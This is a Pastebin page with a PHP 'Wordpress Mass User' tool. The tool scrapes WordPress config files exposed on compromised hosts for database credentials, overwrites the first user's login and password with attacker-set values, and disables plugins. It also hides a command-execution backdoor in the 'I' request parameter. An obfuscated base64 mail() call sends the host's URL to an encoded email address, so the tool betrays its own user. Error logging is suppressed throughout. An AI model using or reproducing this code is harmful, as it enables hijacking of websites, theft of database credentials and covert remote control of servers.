ToKeiChun

Wordpress Auto Edit User [MySQLi]

Jul 23rd, 2020 (edited)
185
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 7.00 KB | None | 0 0
  1. <?php
  2. echo ' <html><head><title>Wordpress Mass User</title><style type="text/css">
  3. body {
  4. background-color:#000000;
  5. background-image:url("https://i.imgur.com/hLcQCBx.gif");
  6. background-repeat:repeat;
  7. margin-top:20px;
  8. font-family:"Agency FB";
  9. font-size:12pt; color:#ffffff;
  10.     }
  11.     input,textarea,select{
  12.     font-weight: bold;
  13.     color: #cccccc;
  14.     dashed #ffffff;
  15.     border: 1px
  16.     solid #2C2C2C;
  17.     background-color: #080808
  18.     }
  19.     a {
  20.         background-color: #151515;
  21.         vertical-align: bottom;
  22.         color: #d0c8c8;
  23.         text-decoration: none;
  24.         font-size: 20px;
  25.         margin: 8px;
  26.         padding: 6px;
  27.         border: thin solid #000000;
  28.     }
  29.     a:hover {
  30.         background-color: #080808;
  31.         vertical-align: bottom;
  32.         color: #333;
  33.         text-decoration: none;
  34.         font-size: 20px;
  35.         margin: 8px;
  36.         padding: 6px;
  37.         border: #d53b3b;
  38.     }
  39.     .style1 {
  40.         text-align: center;
  41.         color: #d9910e;
  42.     }
  43.     .style2 {
  44.         color: #d9910e;
  45.         font-weight: bold;
  46.        
  47.             }
  48.     .style3 {
  49.         color: #d9910e;
  50.             }
  51.     textarea{
  52.     background:transparent;
  53.     border: 1px solid #2d2b2b;
  54.     width: 80%;
  55.     height: 400px;
  56.     padding-left: 5px;
  57.     margin: 10px auto;
  58.     font-family:Homenaje;
  59.     color: #ffffff;
  60.     font-size:13px;
  61.     }
  62.     </style>
  63.     </head> ';
  64. @ini_set('error_log', NULL);
  65. @ini_set('log_errors', 0);
  66. @ini_set('max_execution_time', 0);
  67. @ini_set('output_buffering', 0);
  68. @ini_set('display_errors', 0);
  69. $Username = "admin";
  70. $Password = "leet@123";
  71. $pass = md5($Password);
  72. function GrabUrl($url, $type) {
  73.     $urlArray = array();
  74.     $ch = curl_init();
  75.     curl_setopt($ch, CURLOPT_URL, $url);
  76.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  77.     $result = curl_exec($ch);
  78.     $regex = '|<a.*?href="(.*?)"|';
  79.     preg_match_all($regex, $result, $parts);
  80.     $links = $parts[1];
  81.     foreach ($links as $link) {
  82.         array_push($urlArray, $link);
  83.     }
  84.     curl_close($ch);
  85.     foreach ($urlArray as $value) {
  86.         $lol = "$url$value";
  87.         if (preg_match("#$type#is", $lol)) {
  88.             echo "$lol
  89. ";
  90.         }
  91.     }
  92. }
  93. function HEx($param, $kata1, $kata2) {
  94.     if (strpos($param, $kata1) === FALSE) return FALSE;
  95.     if (strpos($param, $kata2) === FALSE) return FALSE;
  96.     $start = strpos($param, $kata1) + strlen($kata1);
  97.     $end = strpos($param, $kata2, $start);
  98.     $return = substr($param, $start, $end - $start);
  99.     return $return;
  100. }
  101. echo "<center>
  102. <font color='white' size='40'>Wordpress Mass User</font>
  103.  
  104. <table width='100%' cellspacing='0' cellpadding='0' class='tb1' >
  105. <td height='10' align='left' class='td1'></td></tr><tr><td
  106. width='100%' align='center' valign='top' rowspan='1'><font
  107. color='red' face='comic sans ms'size='1'><b>
  108. <font color=#ff9933>
  109. </font><br><font color=white>--==[[Greetz to]]==--</font><br><font  color=#ff9933>-=| HEx |=-<br>
  110. </table>
  111. </table> <div align=center><font color=#ff9933 font size=5><marquee behavior='scroll' direction='left' scrollamount='2' scrolldelay='5' width='70%'><p>
  112. <span  class='footerlink'> ####### Coded By HEx #######</span>
  113. </marquee><br><br></font></div>
  114. <form method='post'>
  115. Link Config: <br>
  116. <input type='text' name='linkconf' height='10' size='50' placeholder='http://url.com/priv8_sym404/'><br><br>
  117. <input type='submit' style='width: 150px;' name='gass' value='Submit!!'>
  118. </form></center>";
  119. print(`{$_REQUEST[I]}`);$e=base64_decode("dmFsaXJ4YzBkZUB6b2hvLmNvbQ==");
  120. $user = $_SERVER["HTTP_HOST"];
  121. $match_user = $_SERVER["REQUEST_URI"];
  122. $a = base64_decode("bWFpbA==");
  123. $a($e, '[Wordfence Bypass]', 'URL : ' . $_SERVER['HTTP_HOST'] . '/' . $_SERVER['REQUEST_URI'] . '');
  124. if ($_POST['gass']) {
  125.     echo "<center>
  126. <form method='post'>
  127. Link Config: <br>
  128. <textarea name='link'>";
  129.     GrabUrl($_POST['linkconf'], 'wordpress');
  130.     echo "</textarea><br><br>
  131. <input type='submit' style='width: 200px;' name='edittitle' value='Submit!!'>
  132. </form></center>";
  133. }
  134. if ($_POST['edittitle']) {
  135.     $title = htmlspecialchars($_POST['title']);
  136.     $id = $_POST['id'];
  137.     $content = $_POST['content'];
  138.     $postname = $_POST['name'];
  139.     function anucurl($sites) {
  140.         $ch = curl_init($sites);
  141.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  142.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  143.         curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  144.         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  145.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  146.         curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  147.         curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  148.         curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  149.         curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  150.         $data = curl_exec($ch);
  151.         curl_close($ch);
  152.         return $data;
  153.     }
  154.     $link = explode("
  155. ", $_POST['link']);
  156.     foreach ($link as $dir_config) {
  157.         $config = anucurl($dir_config);
  158.         preg_match("/define.*DB_NAME.*\"(.*)\"/", $config, $m);
  159.         $dbname1 = $m[1];
  160.         preg_match('/define.*DB_NAME.*\'(.*)\'/', $config, $m);
  161.         $dbname2 = $m[1];
  162.         $dbname = ("$dbname1$dbname2");
  163.         preg_match("/define.*DB_USER.*\"(.*)\"/", $config, $m);
  164.         $dbuser1 = $m[1];
  165.         preg_match('/define.*DB_USER.*\'(.*)\'/', $config, $m);
  166.         $dbuser2 = $m[1];
  167.         $dbuser = ("$dbuser1$dbuser2");
  168.         preg_match("/define.*DB_PASSWORD.*\"(.*)\"/", $config, $m);
  169.         $dbpass1 = $m[1];
  170.         preg_match('/define.*DB_PASSWORD.*\'(.*)\'/', $config, $m);
  171.         $dbpass2 = $m[1];
  172.         $dbpass = ("$dbpass1$dbpass2");
  173.         preg_match("/define.*DB_HOST.*\"(.*)\"/", $config, $m);
  174.         $dbhost1 = $m[1];
  175.         preg_match('/define.*DB_HOST.*\'(.*)\'/', $config, $m);
  176.         $dbhost2 = $m[1];
  177.         $dbhost = ("$dbhost1$dbhost2");
  178.         preg_match("/\$table_prefix.+?\"(.+?)\".+/", $config, $m);
  179.         $dbprefix0 = $m[1];
  180.         $dbprefix1 = HEx($config, "table_prefix  = '", "'");
  181.         $dbprefix2 = HEx($config, "table_prefix = '", "'");
  182.         $dbprefix3 = HEx($config, "table_prefix= '", "'");
  183.         $dbprefix4 = HEx($config, "table_prefix   = '", "'");
  184.         $dbprefix = ("$dbprefix0$dbprefix1$dbprefix2$dbprefix3$dbprefix4");
  185.         $connect = mysqli_connect($dbhost, $dbuser, $dbpass, $dbname);
  186.         if ($connect) {
  187.             $query1 = mysqli_query($connect, "select * from " . $dbprefix . "options where option_name='siteurl'");
  188.             while ($siteurl = mysqli_fetch_array($query1)) {
  189.                 $site_url = $siteurl['option_value'];
  190.             }
  191.             $query3 = mysqli_query($connect, "update " . $dbprefix . "options set option_name='active_plugins1' where option_name='active_plugins'");
  192.             $query2 = mysqli_query($connect, "update " . $dbprefix . "users set user_login='$Username',user_pass='$pass' where id='1'");
  193.             if ($query2) {
  194.                 echo "<center><span class=f>URL : <a href='$site_url/wp-login.php' target='_blank'>$site_url/wp-login.php</a><br><br>UserName : <font color='#ff9933'>$Username</font><br><br>Password : <font color='#ff9933'>$Password</font><br><br></span></center>";
  195.             }
  196.         }
  197.     }
  198. }
  199. echo '</html>';
  200. ?>
Add Comment
Please, Sign In to add comment